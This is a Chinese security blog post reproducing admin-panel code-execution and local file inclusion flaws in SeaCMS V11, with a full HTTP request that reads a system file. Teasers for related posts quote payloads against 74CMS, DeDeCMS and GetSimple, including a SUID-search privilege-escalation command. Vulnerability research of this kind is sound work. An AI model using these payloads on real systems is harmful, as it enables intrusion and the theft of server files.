【漏洞分析】SeaCMS_海洋CMS_V11 - 12.5后台代码执行漏洞

发表于2025-11-17|更新于2025-11-17|漏洞Web分析复现

|浏览量:

前言

复现CMS：SeaCMS（海洋CMS）

复现版本：V11

地址：https://github.com/seacms-net/CMS/releases/tag/V11

根据代码相关内容，发现新版本理论（代码一致，尚未复现）仍然存在该漏洞。

漏洞点 admin_ip.php

经过代码审计发现，POST参数v及ip均未使用任何过滤

也就是可以通过双引号闭合，配合php代码进行代码执行。

漏洞点 admin_notify.php

其实原理一致，都是没有进行过滤等操作

附赠一个本地文件包含

GET /0mrht1/admin_safe.php?action=download&file=C:/windows/system.ini HTTP/1.1
Host: localhost
Sec-Fetch-Site: none
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Upgrade-Insecure-Requests: 1
sec-ch-ua: "Chromium";v="142", "Google Chrome";v="142", "Not_A Brand";v="99"
sec-ch-ua-platform: "Windows"
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Cookie: PHPSESSID=soheavu46t8kuqcgtg62os45r0; t00ls=e54285de394c4207cd521213cebab040; t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MjY6InBocCB8IHBocD8gfCBwaHRtbCB8IHNodG1sIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
sec-ch-ua-mobile: ?0

真的是一点过滤也没有啊~

文章作者: 末心

文章链接: https://moxin1044.github.io/posts/d051/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源末心的小博客！

漏洞漏洞分析 SeaCMS

相关推荐

【漏洞分析】74CMS-骑士CMSV5.0.1后台远程代码执行漏洞分析

前言复现CMS：74CMS（骑士CMS）复现版本：V5.0.1 漏洞点版本验证网站后台底部拥有版本号漏洞复现 1http://192.168.121.130/.',phpinfo(),'/.com 随后刷新界面即可看到phpinfo()信息漏洞分析由于CMS版本较老，先复现了一下已公开的漏洞。根据请求反查找到： 123456789101112131415161718192021222324public function edit(){ if(IS_POST){ $site_domain = I('request.site_domain','','trim'); $site_domain = trim($site_domain,'/'); $site_dir = I('request.site_dir',C('qscms_site_dir&#...

【漏洞分析】DEDECMS-V5.7SP2-5.7.107-后台RCE漏洞

前言复现CMS：DeDeCMS 复现版本：V5.7-SP2 漏洞点1 模块->文件管理器 DeDeCMS的文件管理器功能，支持文件上传上传一个info.php 成功获取FLAG 漏洞点2 广告管理添加后，查看调用代码访问JS代码中给出的路径那么如果是输出FLAG呢？漏洞点3 后台任意代码执行 CVE-2018-7700 1/tag_test_action.php?url=a&token=&partcode={dede:field name='source' runphp='yes'}phpinfo();{/dede:field} 漏洞点4 sys_cache_up.php后台文件写入漏洞代码在/dede/sys_cache_up.php文件 36行处，由于可以操作文件内容，且文件内容是从数据库取值的，因此通过在数据库里写入内容，通过查询数据库将文件写入服务器。使用下面请求将代码写入数据库： 1/dede/stepselect_main.php?action...

【漏洞分析】GetSimple-CMS-远程命令执行（CVE-2019-11231）

前言复现CMS：GetSimple CMS 复现版本：3.3.15 漏洞点1 xml信息泄露访问：/data/users/admin.xml，可获得用户名、Hash后的密码、邮箱等信息。题目仅给出了后台地址 hash的密码我们去解密一下进入后台地址：http://challenge.qsnctf.com:35595/admin/ 编辑主题执行完phpinfo即退出访问：http://challenge.qsnctf.com:35595/theme/Innovation/template.php 但是很遗憾没有发现FLAG 还是回去改一下一句话木马，这个环境需要提权一下 1find / -perm -u=s -type f 2>/dev/null 使用find提权，读取/proc/1/environ拿到FALG

数据加载中